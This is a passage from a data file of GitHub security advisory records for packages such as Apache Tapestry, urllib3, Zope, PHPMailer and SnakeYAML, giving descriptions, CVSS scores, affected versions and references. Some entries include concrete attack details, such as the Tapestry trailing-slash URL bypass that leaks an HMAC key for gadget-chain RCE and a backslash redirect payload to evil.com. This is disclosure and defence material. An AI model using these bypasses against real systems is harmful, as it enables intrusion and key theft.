'3.0.0'}, {'fixed': '3.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-qq3j-xp49-j73f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-4053'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/pull/8317'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/0ad800ef43d3b826f31a5ad8dfbb4fe05d143688'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/b6bbe4f08bbb98eadd6c9cd726b08a5c639908b3'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/releases/tag/v3.2.4'}]","{'cwe_ids': ['CWE-22'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T20:57:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-w5rh-j4g3-jr29,2023-05-24T14:45:31Z,2021-06-16T17:29:17Z,,['CVE-2021-21651'],Missing Authorization in Jenkins S3 publisher Plugin,"Jenkins S3 publisher Plugin prior to 0.11.7 and 0.11.5.1 does not perform a permission check in an HTTP endpoint. + +This allows attackers with Overall/Read permission to obtain the list of configured profiles. + +S3 publisher Plugin 0.11.7 and 0.11.5.1 performs permission checks when providing a list of configured profiles.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:s3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.6'}, {'fixed': '0.11.7'}]}], 'versions': ['0.11.6']}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:s3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21651'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21651.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2201'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T18:59:06Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-q2q7-5pp4-w6pg,2021-10-21T16:39:49Z,2021-06-01T21:19:32Z,,['CVE-2021-33503'],Catastrophic backtracking in URL authority parser when passed URL containing many @ characters,"### Impact + +When provided with a URL containing many `@` characters in the authority component the authority regular expression exhibits catastrophic backtracking causing a denial of service if a URL were passed as a parameter or redirected to via an HTTP redirect. + + +### Patches + +The issue has been fixed in urllib3 v1.26.5. + +### References + +- [CVE-2021-33503](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503) +- [JVNVU#92413403 (English)](https://jvn.jp/en/vu/JVNVU92413403/) +- [JVNVU#92413403 (Japanese)](https://jvn.jp/vu/JVNVU92413403/) +- [urllib3 v1.26.5](https://github.com/urllib3/urllib3/releases/tag/1.26.5) + +### For more information +If you have any questions or comments about this advisory: +* Ask in our [community Discord](https://discord.gg/urllib3) +* Email [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'urllib3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.25.4'}, {'fixed': '1.26.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/security/advisories/GHSA-q2q7-5pp4-w6pg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33503'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/commit/2d4a3fee6de2fa45eb82169361918f759269b4ec'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/commit/5b047b645f5f93900d5e2fc31230848c25eb1f5f#diff-52026d639119bf1e0364836b4e8a18bd9ed3c95c6ba39b26534a5057a65e35bbR65'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-q2q7-5pp4-w6pg'}, {'type': 'PACKAGE', 'url': 'https://github.com/urllib3/urllib3'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SCV7ZNAHS3E6PBFLJGENCDRDRWRZZ6W/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FMUGWEAUYGGHTPPXT6YBD53WYXQGVV73/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-36'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T22:09:12Z', 'nvd_published_at': '2021-06-29T11:15:00Z'}" +1.4.0,GHSA-mj8x-cpr8-x39h,2021-04-19T21:38:56Z,2021-06-16T17:33:19Z,,['CVE-2021-27850'],Remote code execution in Apache Tapestry,"A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class` which contains a HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/` The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from ysoserial). Solution for this vulnerability: * For Apache Tapestry 5.4.0 to 5.6.2, upgrade to 5.6.3 or later. * For Apache Tapestry 5.7.0, upgrade to 5.7.1 or later.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tapestry:tapestry-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.0'}, {'fixed': '5.6.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tapestry:tapestry-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.7.0'}, {'fixed': '5.7.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27850'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/TAP5-2663'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0002/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/04/15/1'}]","{'cwe_ids': ['CWE-502', 'CWE-922'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T21:38:56Z', 'nvd_published_at': '2021-04-15T08:15:00Z'}" +1.4.0,GHSA-39q4-p535-c852,2023-09-07T21:45:40Z,2021-06-10T17:25:05Z,,['CVE-2021-23392'],Uncontrolled Resource Consumption in locutus,The package locutus before 2.0.15 is vulnerable to Regular Expression Denial of Service (ReDoS) via the gopher_parsedir function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'locutus'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23392'}, {'type': 'WEB', 'url': 'https://github.com/locutusjs/locutus/pull/446'}, {'type': 'WEB', 'url': 'https://github.com/locutusjs/locutus/commit/eb863321990e7e5514aa14f68b8d9978ece9e65e'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LOCUTUS-1090597'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-09T20:22:09Z', 'nvd_published_at': '2021-06-08T08:15:00Z'}" +1.4.0,GHSA-rpcg-f9q6-2mq6,2021-06-08T17:17:21Z,2021-06-08T18:45:52Z,,[],Remote Code Execution via traversal in TAL expressions,"This advisory extends the previous advisory at https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36 with additional cases of TAL expression traversal vulnerabilities. + +### Impact +Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use. + +By default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk. + +### Patches +The problem has been fixed in Zope 5.21 and 4.6.1. + +### Workarounds +The workaround is the same as for https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36: A site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only. + +### References +* [The previous advisory (GHSA-5pr9-v234-jw36)](https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [Zope issue tracker](https://github.com/zopefoundation/Zope/issues) +* Email us at [security@plone.org](mailto:security@plone.org) +",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-rpcg-f9q6-2mq6'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-08T17:17:21Z', 'nvd_published_at': None}" +1.4.0,GHSA-pjc4-3w99-j7v4,2022-01-10T21:33:30Z,2021-06-15T15:56:59Z,,['CVE-2021-23393'],Open redirect in Flask-Unchained,"This affects the package Flask-Unchained before 0.9.0. When using the the _validate_redirect_url function, it is possible to bypass URL validation and redirect a user to an arbitrary URL by providing multiple back slashes such as \\\evil.com/path. This vulnerability is only exploitable if an alternative WSGI server other than Werkzeug is used, or the default behaviour of Werkzeug is modified using 'autocorrect_location_header=False.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Unchained'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23393'}, {'type': 'WEB', 'url': 'https://github.com/briancappello/flask-unchained/commit/2bfeedf1bc31df851cab8c66df0c432b10406aad'}, {'type': 'WEB', 'url': 'https://github.com/briancappello/flask-unchained/commit/71e36b28166f9ffbe0a991f51127f0984f7e6a40'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-FLASKUNCHAINED-1293189'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:36:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-mrwr-2945-fr22,2021-06-23T18:44:29Z,2021-06-22T15:17:28Z,,['CVE-2021-32245'],Cross-site scripting in PageKit,"In PageKit v1.0.18, a user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to ""/storage/exp.svg"" that will point to http://localhost/pagekit/storage/exp.svg. When a user comes along to click that link, it will trigger a XSS attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pagekit/pagekit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32245'}, {'type': 'WEB', 'url': 'https://github.com/pagekit/pagekit/issues/963'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-17T17:32:02Z', 'nvd_published_at': '2021-06-16T21:15:00Z'}" +1.4.0,GHSA-24p5-x9f9-vvpx,2023-07-05T23:17:56Z,2021-06-08T20:10:27Z,,['CVE-2021-20681'],Cross-site Scripting (XSS) in baserCMS,Improper neutralization of JavaScript input in the page editing function of baserCMS versions prior to 4.4.5 allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20681'}, {'type': 'WEB', 'url': 'https://basercms.net/security/JVN64869876'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN64869876/index.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:39:01Z', 'nvd_published_at': '2021-03-26T09:15:00Z'}" +1.4.0,GHSA-rvwf-54qp-4r6v,2022-08-11T21:47:32Z,2021-06-04T21:37:45Z,,['CVE-2017-18640'],SnakeYAML Entity Expansion during load operation,"The Alias feature in SnakeYAML 1.18 allows entity expansion during a load operation, a related issue to CVE-2003-1564.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.yaml:snakeyaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18640'}, {'type': 'PACKAGE', 'url': 'https://bitbucket.org/asomov/snakeyaml'}, {'type': 'WEB', 'url': 'https://bitbucket.org/asomov/snakeyaml/commits/da11ddbd91c1f8392ea932b37fa48110fa54ed8c'}, {'type': 'WEB', 'url': 'https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion'}, {'type': 'WEB', 'url': 'https://bitbucket.org/asomov/snakeyaml/wiki/Billion%20laughs%20attack'}, {'type': 'WEB', 'url': 'https://bitbucket.org/asomov/snakeyaml/wiki/Changes'}, {'type': 'WEB', 'url': 'https://bitbucket.org/snakeyaml/snakeyaml/issues/377'}, {'type': 'WEB', 'url': 'https://bitbucket.org/snakeyaml/snakeyaml/wiki/Changes'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1058e7646988394de6a3fd0857ea9b1ee0de14d7bb28fee5ff782457@%3Ccommits.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r154090b871cf96d985b90864442d84eb027c72c94bc3f0a5727ba2d1@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r16ae4e529401b75a1f5aa462b272b31bf2a108236f882f06fddc14bc@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1703a402f30c8a2ee409f8c6f393e95a63f8c952cc9ee5bf9dd586dc@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r182e9cf6f3fb22b9be0cac4ff0685199741d2ab6e9a4e27a3693c224@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r191ceadb1b883357384981848dfa5235cb02a90070c553afbaf9b3d9@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1aab47b48a757c70e40fc0bcb1fcf1a3951afa6a17aee7cd66cf79f8@%3Ccommon-commits.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1dfac8b6a7097bcb4979402bbb6e2f8c36d0d9001e3018717eb22b7e@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1ffce2ed3017e9964f03ad2c539d69e49144fc8e9bf772d641612f98@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r20350031c60a77b45e0eded33e9b3e9cb0cbfc5e24e1c63bf264df12@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r22ac2aa053b7d9c6b75a49db78125c9316499668d0f4a044f3402e2f@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r28c9009a48d52cf448f8b02cd823da0f8601d2dff4d66f387a35f1e0@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a5b84fdf59042dc398497e914b5bb1aed77328320b1438144ae1953@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2b05744c0c2867daa5d1a96832965b7d6220328b0ead06c22a6e7854@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2db207a2431a5e9e95e899858ab1f5eabd9bcc790a6ca7193ae07e94@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r436988d2cfe8a770ae361c82b181c5b2bf48a249bad84d8a55a3b46e@%3Cdev.phoenix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r465d2553a31265b042cf5457ef649b71e0722ab89b6ea94a5d59529b@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4c682fb8cf69dd14162439656a6ebdf42ea6ad0e4edba95907ea3f14@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d7f37da1bc2df90a5a0f56eb7629b5ea131bfe11eeeb4b4c193f64a@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5510f0125ba409fc1cabd098ab8b457741e5fa314cbd0e61e4339422@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r55d807f31e64a080c54455897c20b1667ec792e5915132c7b7750533@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r56805265475919252ba7fc10123f15b91097f3009bae86476624ca25@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r643ba53f002ae59068f9352fe1d82e1b6f375387ffb776f13efe8fda@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r666f29a7d0e1f98fa1425ca01efcfa86e6e3856e01d300828aa7c6ea@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6c91e52b3cc9f4e64afe0f34f20507143fd1f756d12681a56a9b38da@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d54c2da792c74cc14b9b7665ea89e144c9e238ed478d37fd56292e6@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72a3588d62b2de1361dc9648f5d355385735e47f7ba49d089b0e680d@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7ce3de03facf7e7f3e24fc25d26d555818519dafdb20f29398a3414b@%3Cdev.phoenix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8464b6ec951aace8c807bac9ea526d4f9e3116aa16d38be06f7c6524@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8b57c57cffa01e418868a3c7535b987635ff1fb5ab534203bfa2d64a@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r900e020760c89f082df1c6e0d46320eba721e4e47bb9eb521e68cd95@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raebd2019b3da8c2f90f31e8b203b45353f78770ca93bfe5376f5532e@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb0e033d5ec8233360203431ad96580cf2ec56f47d9a425d894e279c2@%3Cpr.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb34d8d3269ad47a1400f5a1a2d8310e13a80b6576ebd7f512144198d@%3Ccommon-dev.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb5c33d0069c927fae16084f0605895b98d231d7c48527bcb822ac48c@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7b28ac741e32dd5edb2c22485d635275bead7290b056ee56baf8ce0@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbaa1f513d903c89a08267c91d86811fa5bcc82e0596b6142c5cea7ea@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc3211c71f7e0973a1825d1988a3921288c06cd9d793eae97ecd34948@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcb2a7037366c58bac6aec6ce3df843a11ef97ae4eb049f05f410eaa5@%3Ccommon-commits.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcb4b61dbe2ed1c7a88781a9aff5a9e7342cc7ed026aec0418ee67596@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rce5c93bba6e815fb62ad38e28ca1943b3019af1eddeb06507ad4e11a@%3Ccommits.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd582c64f66c354240290072f340505f5d026ca944ec417226bb0272e@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd34c0479587e32a656d976649409487d51ca0d296b3e26b6b89c3f5@%3Ccommon-commits.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re791a854001ec1f79cd4f47328b270e7a1d9d7056debb8f16d962722@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re851bbfbedd47c690b6e01942acb98ee08bd00df1a94910b905bc8cd@%3Cdev.atlas.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reb1751562ee5146d3aca654a2df76a2c13d8036645ce69946f9c219e@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/recfe569f4f260328b0036f1c82b2956e864d519ab941a5e75d0d832d@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf95bebee6dfcc55067cebe8482bd31e6f481d9f74ba8e03f860c3ec7@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe0aab6c3bebbd9cbfdedb65ff3fdf420714bcb8acdfd346077e1263@%3Ccommon-commits.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CKN7VGIKTYBCAKYBRG55QHXAY5UDZ7HA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PTVJC54XGX26UJVVYCXZ7D25X3R5T2G6/'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/org.yaml/snakeyaml/1.25/usages'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202305-28'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-776'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-04T21:34:16Z', 'nvd_published_at': '2019-12-12T03:15:00Z'}" +1.4.0,GHSA-7q44-r25x-wm4q,2021-06-30T18:13:17Z,2021-06-22T15:17:51Z,,['CVE-2021-34551'],Remote Code Execution vulnerability in PHPMailer 6.4.1 running on Windows,"PHPMailer 6.4.1 contains a possible remote code execution vulnerability through the `$lang_path` parameter of the `setLanguage()` method. If the `$lang_path` parameter is passed unfiltered from user input, it can be set to [a UNC path](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#unc-paths), and if an attacker is also able to create a remote mount on the server that the UNC path points to, a script file under their control may be executed. + +### Impact +Arbitrary code may be run by a remote attacker under the web server or PHP process running on Window hosts. + +### Patches +Mitigated in PHPMailer 6.5.0 by no longer treating translation files as PHP code, but by parsing their text content directly. +This approach avoids the possibility of executing unknown code while retaining backward compatibility. This isn't ideal, so the current translation format is deprecated and will be replaced in the next major release. + +### Workarounds +Any of: +* Ensure that calling code does not pass unfiltered user-supplied data to the `$lang_path` parameter of the `setLanguage()` method. +* Block or filter the use of unknown UNC paths in this parameter (or altogether). +* Ensure that unauthorised users do not have the ability to read from unknown remote servers via UNC paths. +* Run on an OS that does not support UNC paths + +### References +[CVE-2021-34551](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34551). + +Reported by [listensec.com](https://listensec.com) via Tidelift. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [PHPMailer](https://github.com/PHPMailer/PHPMailer) +* [Email the maintainers](mailto:phpmailer@synchromedia.co.uk) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-7q44-r25x-wm4q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34551'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/commit/acd264bf17ff4ac5c915f0d4226dce8a9ea70bc3'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3YRMWGA4VTMXFB22KICMB7YMFZNFV3EJ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FJYSOFCUBS67J3TKR74SD3C454N7VTYM/'}]","{'cwe_ids': ['CWE-434', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T19:50:57Z', 'nvd_published_at': '2021-06-16T18:15:00Z'}" +1.4.0,GHSA-mw3r-pfmg-xp92,2021-10-21T18:58:58Z,2021-06-16T17:37:11Z,,['CVE-2021-23926'],Improper Restriction of Recursive Entity References in Apache XMLBeans,The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlbeans:xmlbeans'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23926'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/XMLBEANS-517'}, {'type': 'WEB', 'url': 